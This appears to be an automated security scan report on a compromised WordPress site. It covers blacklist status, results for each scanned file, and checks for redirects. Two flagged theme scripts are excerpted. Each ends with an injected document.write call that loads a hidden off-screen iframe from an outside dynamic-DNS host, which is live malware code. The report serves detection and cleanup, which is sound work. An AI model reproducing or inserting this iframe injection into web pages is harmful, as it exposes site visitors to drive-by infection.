Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wellnessnorthtexas.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wellnessnorthtexas.net/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wellnessnorthtexas.net/ | 200 OK Content-Length: 18258 Content-Type: text/html | clean |
http://wellnessnorthtexas.net/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.6 | 200 OK Content-Length: 8417 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/cufon-yui.js | 200 OK Content-Length: 18442 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/Colaborate-Thin_400.font.js | 200 OK Content-Length: 47140 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/jquery.easing.1.3.js | 200 OK Content-Length: 8275 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged in the middle (marked […]). The library code is followed by an appended `document.write` call that injects an iframe positioned off-screen (`left:-550px`) and loaded from a different host than the scanned site; that trailing statement is the part to look for when cleaning the file:
jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur […] return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');
Antivirus reports:
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/superfish.js | 200 OK Content-Length: 3892 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged in the middle (marked […]). As in the previous file, the plugin code is followed by an appended `document.write` call that injects an off-screen iframe (`left:-550px`) pointing at the same external URL:
;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men […] .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');
Antivirus reports:
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/custom.js | 200 OK Content-Length: 8864 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/plugins/contact-form-7/includes/js/jquery.form.js?ver=3.09 | 200 OK Content-Length: 14416 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is cut off and shows only the beginning of the file, so the portion that triggered the detection is not visible here. The full file should be compared against a known-good copy of the plugin:
(function(e){var c={};c.fileapi=e("<input type='file'/>").get(0).files!==undefined;c.formdata=window.FormData!==undefined;e.fn.ajaxSubmit=function(g){if(!this.length){d("ajaxSubmit: skipping submit process - no element selected");return this}var f,w,i,l=this;if(typeof g=="function"){g={success:g}}f=this.attr("method");w=this.attr("action");i=(typeof w==="string")?e.trim(w):"";i=i||window.location.href||"";if(i){i=(i.match(/^([^#]+)/)||[])[1]}g=e.extend(true,{url:i,success:e.ajaxSettings.su […]
Antivirus reports:
http://wellnessnorthtexas.net/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.2 | 200 OK Content-Length: 6808 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/epanel/page_templates/js/prettyphoto/jquery.prettyPhoto.js?ver=3.0.3 | 200 OK Content-Length: 22373 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 4196 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/about/ | 200 OK Content-Length: 15739 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wellnessnorthtexas.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:16:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://wellnessnorthtexas.net/>; rel=shortlink
X-Pingback: http://wellnessnorthtexas.net/xmlrpc.php
GET / HTTP/1.1
Host: wellnessnorthtexas.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:16:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://wellnessnorthtexas.net/>; rel=shortlink
X-Pingback: http://wellnessnorthtexas.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: wellnessnorthtexas.net
Referer: http://www.google.com/search?q=wellnessnorthtexas.net
Result:
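The result is similar to the first query. No suspicious redirects were found. This check covers only server-side redirects that depend on the Referer header. The iframe injection reported in the scanned JavaScript files above runs in the visitor's browser and would not show up in this test.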
GET / HTTP/1.1
Host: wellnessnorthtexas.net
Referer: http://www.google.com/search?q=wellnessnorthtexas.net
Result:
The result is similar to the first query. There are no suspicious redirects found.